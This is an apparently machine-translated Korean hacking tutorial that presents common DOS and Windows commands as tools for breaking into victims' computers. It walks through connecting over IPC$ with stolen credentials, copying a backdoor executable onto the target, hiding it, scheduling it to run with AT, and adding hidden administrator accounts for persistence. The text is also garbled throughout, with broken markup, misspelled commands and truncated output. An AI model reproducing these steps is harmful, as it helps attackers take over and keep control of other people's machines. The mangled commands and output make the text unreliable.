DOS 명령 시작

여러분은 침입할 때 반드시 DOS 명령을 사용하게 될 것입니다. 그 기능은 매우 강력합니다. 오늘 저는 자주 사용하는 DOS 명령에 대해 자세히 설명하겠습니다. 주로 입문자와 DOS 명령을 접한 적은 친구에게 보여 줍니다. 좀 더 자주 사용하는 몇 가지를 골라서 말씀드리겠습니다.

< Windows XP 는 ..

DIR

현재 디스크 아래에 있는 모든 폴더와 파일을 표시합니다.

더 일반적인 방법은 뒷문이나 서버 (예: 이름) 를 업로드하는 것입니다 업로드가 성공했는지 확인하고 싶습니다. DIR 명령을 사용하여 볼 수 있습니다. 명령은 다음과 같습니다.

dir c: \ winnt \ system32 \ systems.exe

762systems.exe

파일 1 개 194,762 바이트

0 디렉토리 4,658,597,888 가용 바이트

<;

볼륨의 일련 번호는 6458-3db8

c: \ winnt \ system32 \ 의 디렉토리

입니다. 파일을 찾을 수 없습니다 Cd winnt // winnt 폴더

c: \ winntgt; Cd system32 // system32 폴더 입력

c: \ winnt \ system32gt; Cd.. // 한 레벨 위로 돌아가기

c: \ winntgt; Cd ..

c: \ gt;

c: \ gt; D://d 디스크 입력

d: \ gt; E://e 디스크 입력

e: \ gt;

del 및 deltree

DEL: 파일 삭제.

다음 명령을 보십시오.

c: Dell c: \ XX \ WW.txt//CD 의 xx 디렉토리에서 ww 라는 파일을 삭제합니다.

c: \ gt;

c: \ gt; Dell c: \ XX \ *. *//CD 의 xx 디렉토리에 있는 모든 파일 삭제

deltree

이것은 더욱 파괴적이며 모든 파일을 삭제할 수 있을 뿐 아니라 폴더도 < Deltree c:\winnt ///CD 에 있는 winnt 의 모든 파일과 폴더 삭제.

이 사람은.

attrid

를 조심해서 사용해야 한다 S 는

파일 또는 폴더 속성을 변경하는 것을 의미하고, "+"는 증가를 의미하며, "-"는 속성을 제거하는 것을 의미합니다.

보통 우리는 뒷문이나 서버를 육계의 c: \ winnt 에 업로드합니다 Attrid+h c: \ winnt \ system32 \ systems.exe//system32 에서 systems.exe 를 찾을 수 없습니다

c > Attrid-h c: \ 1.txt \ system32 \ systems.exe//systems.exe 의 숨겨진 속성 제거

copy

Copy c

: \ 1.txt d: \ vv \ 1.exe

예를 들어 육계와 IPC$ 연결을 설정했습니다 (연결 방법? (나중에 얘기할게요) 그리고 육계는 개방되어 있습니다. * * * 여기 예를 들어 D 디스크를 개방합니다. CD 아래에 있는 systems.exe 라는 뒷문이나 서버측을 육계의 D 접시에 올려주시면 다음과 같이 주문할 수 있습니다.

< P > C: \ G Copy c: \ systems.exe \ \ 육계 IP \ d $

유형

파일 내용 표시

유형 c: \ xx \ Hack.txt

일련 번호 시작 IP 주소 종료 IP 주소 국가/도/시/군/조직

58024.179.140.000022 P >

80 061.013.000.000 061.013.255.255 대만

86 061.058.065.000 P >

87 061.059.160.000 061.059.255.255 대만

89 061.070.100.000 P >

1788061.217.179.000 061.217.179.255 대만 타이난시

1789061.216.000 P >

1790 061.220.080.000 061.220.150.255 대만 타이베이시

1791 061.224.000 P >

1792 061.225.000.000 061.225.255.255 대만

3390 134.208.000 .. P >

3584 139.175.000.000 139.175.255.255 대만

3590 140.092.000 .. P >

3593 140.096.000.000 140.096.255.255 대만

3596 140.112.000 ..

또 다른 용법은 육계의 CMD 에 들어간 후 육계가 사용하는 운영체제를 살펴보는 것입니다. 명령은 다음과 같습니다.

< P > C: \ GT; Type c: \ boot.ini

[부트 로더]

timeout = 30

dimeout

P >

[operating systems]

multi (0) disk (0) rdisk (0) partition (1) , 저는 XP 시스템을 사용합니다.

이것은 제가 자주 사용한다고 생각하는 명령이고, 다른 것은 rd 입니다. Md 등. 당신들은 자료를 찾아 볼 수 있는 것에 관심이 있습니다. 평진은 비교적 적게 사용한다.

< P > < ping

< P > < P > 이것은 가장 많이 쓰는 명령이다. 하지만 지금은 제대로 작동하지 않는 것 같다. 대부분의 사이트와 개인용 컴퓨터는 방화벽으로 Ping 을 차단한다. 대부분의 경우 P 가 통하지 않는다.

ping URL

아래 p 는 본 사이트

c: \ gt; Ping www.hf110.com

pinging www.hf110.com [218.89.0.231] with 32 bytes of data P >

reply from 218.89.0.231: bytes = 32 time = 67ms TTL = 116

reply from 218 > P >

reply from 218.89.0.231: bytes = 32 time = 67ms TTL = 116

ping statistics Lost = 0 (0 loss),

approximate round trip times in milli-seconds:

minimum Average = 66ms

위 p 사이트의 IP 는 218.89.0.231 이고, TTL=116. 대략 windows 운영 체제를 사용하고 있다. 일반적으로 TTL 값은 128 정도다 관리자는 레지스트리를 변경하여 TTL 값을 수정할 수 있습니다.

net use

육계의 사용자 이름과 암호를 얻은 후 이 명령을 사용하여 IPC$ 연결

net use > (예: 시스템. exe, 당신의 d 디스크 아래) ..

copy d: \ systems.exe \ \ 육계 ip\c$ // 여기 개방해야 합니다 24 시간제입니다. 예를 들어 오후 3 시 10 분입니다. 쓰기 15: 10

AT \ \ 육계 IP 15: 12 Systems.exe//15: 12 분에 sy 를 실행합니다

Stems.exe

여기, 당신이 반등목마를 업로드하면, 그것이 당신을 연결하기를 기다릴 수 있습니다. 사실, 침입 과정에서, 많은 우연성이 있습니다. 예를 들면, 위에서, 당신은 IPC 연결을 성공적으로 할 수 있습니다. 하지만 반드시 nettime \ 하지만 뒷문이나 서버측이 반드시 운행할 기회가 있는 것은 아니다.

바이러스 백신 소프트웨어에 의해 살해될 수 있다. 그래서 침입 과정에서 실패는 흔한 일이다. 이 방법은 안 되고 또 다른.

넷사용자

가 될 수 있다 Net user

\\ BILLGATES 의 사용자 계정

----------------

c: \ gt;

위 내 모든 사용자 ..

이제 새 setwell 사용자, 암호 123456, 스크린 샷은 다음과 같습니다

c: \ gt; Net user setwell 123456 /add

명령이 성공적으로 완료되었습니다.

c: \ gt; Net local group administrators setwell/add//이 명령은 set well 을 관리자

명령으로 추가하는 데 성공했습니다.

다음으로

c: \ gt; Net user

\\ BILLGATES 의 사용자 계정

---------------- P >

set well support _ 388945a0yhkj

명령이 성공적으로 완료되었습니다.

만든 사용자는 net user 명령을 사용하여 볼 수 있습니다. 우리는 사용자 뒤에 $ 를 추가하여 작은 숨김을 할 수 있습니다. 이번에는 set 라는 사용자를 만들었습니다. 스크린 샷은 다음과 같습니다.

c: \ gt; Net user set$ 123456 /add

명령이 성공적으로 완료되었습니다.

c: \ gt; Net local group administrators set $/add

명령이 성공적으로 완료되었습니다.

c: \ gt; Net user

\\ BILLGATES 의 사용자 계정

---------------- P >

set well support _ 388945a0yhkj

명령이 성공적으로 완료되었습니다.

c: \ gt;

아니요, 방금 설정한 사용자 set$ 를 볼 수 없습니다. 이 명령을 사용하여 볼 수 있습니다. net localgroup administrators, 이 명령은 다음과 같은 모든 관리자를 보여 줍니다.

Net local group administrators

별칭 administrators

주석 관리자는 컴퓨터/도메인에 대한 무제한 전체 액세스 권한을 가집니다

P >

---------------

c: \ gt;

아니요, 우리는 set$ 라는 사용자를 보았습니다.

사용자를 삭제하려면 이 명령을 사용합니다.

c: \ gt; Net user set well/delete

net start

1. net start TTS 와 같은 일부 서비스 시작

Net start

는 다음과 같은 Windows 서비스를 시작했습니다.

자동 업데이트

com+event system P >

distributed link tracking client

DNS client

error reporting service

logical disk manager

messenger

이것은 서비스의 일부일 뿐입니다 ..

net stop C$ D$ e$ f$ admin$ ipc$ 를 즐기세요. 이것이 시스템 기본값입니다. 제 모든 것이 꺼져 있습니다. 저는

육계에 가서 그림을 찍으세요.

c: Netshare

d $ d: \ 기본값 * * * 즐기세요

f $ f: \ 기본 * * * 즐거움

admin $ c: \ winnt 원격 관리

c $ c: \ 기본값 * * * 즐거움

e $ e: \ 기본값 * * * 즐거움

명령이 성공적으로 완료되었습니다.

c: ₩ documents and settings ₩ administrator gt;

이 육계의 IPC$*** * * 이 육계의 IPC $ * * * * * *

netview

도 보기 * * Net view

서버 이름 주석

------------- 17

\ \ hmz

\ \ kgh

명령이 성공적으로 완료되었습니다.

c: ₩ documents and settings ₩ administrator gt;

DOS 명령을 배우는 것은 좀 귀찮아 보이지만 사실 쉽게 배울 수 있다. 그리고 잘 배웠고, 침략에서 중요한 역할을 할 것이다. 다음에 netstat 등의 명령을 하겠습니다.

netstat-an Netstat-an

active connections

proto local address foreign address state

TCP 0.0.0.0: 135 0.0.0.0: 0 listening

TCP 0.0.0.0 P >

TCP 0.0.0.0: 1029 0.0.0.0: 0 listening

TCP 0.0.0.0 P >

tcp180.254.158.42: 139 0.0.0.0: 0 listening

tcp218.95 .. P >

UDP 0.0.0.0: 500 *: *

UDP 0.0.0.0: 1035 *: *

UDP 0.0.0.0: 1136 *: *

proto local address foreign address state

LISTENING 수신 상태는 상대방의 접속 대기 중

ESTABLISHED 가 접속 중 ..

TCP 프로토콜이 TCP

UDP 임을 나타냅니다 P >

ip(218.95.49.187: 2935 ip(218.89.0.231: 80 established

이는 TCP 프로토콜 네이티브 id 를 활용한다는 의미입니다 P >

쿼리

이 명령은 3389 포트 (반드시 3389 포트일 필요는 없으며 다른 포트로 변경되었을 수도 있음. 엄밀히 말하면 원격 터미널 서비스가 켜져 있어야 함) 를 연 기계만 사용할 수 있다. 1$ 의 사용자 이름을 사용했습니다 Query user

username session name id state

administrator console 0 실행 중

1 실행 중

위에 있는 것을 보고 관리자도 있습니다. 종료하시려면 다음과 같은 명령을 사용하십시오.

logoff id 여기 logoff 1.

;

上篇: 군용 야광봉에 대하여 下篇: 휴대전화 폭탄을 폭발시키지 않으면 홈페이지가 열리지 않는다.
관련 내용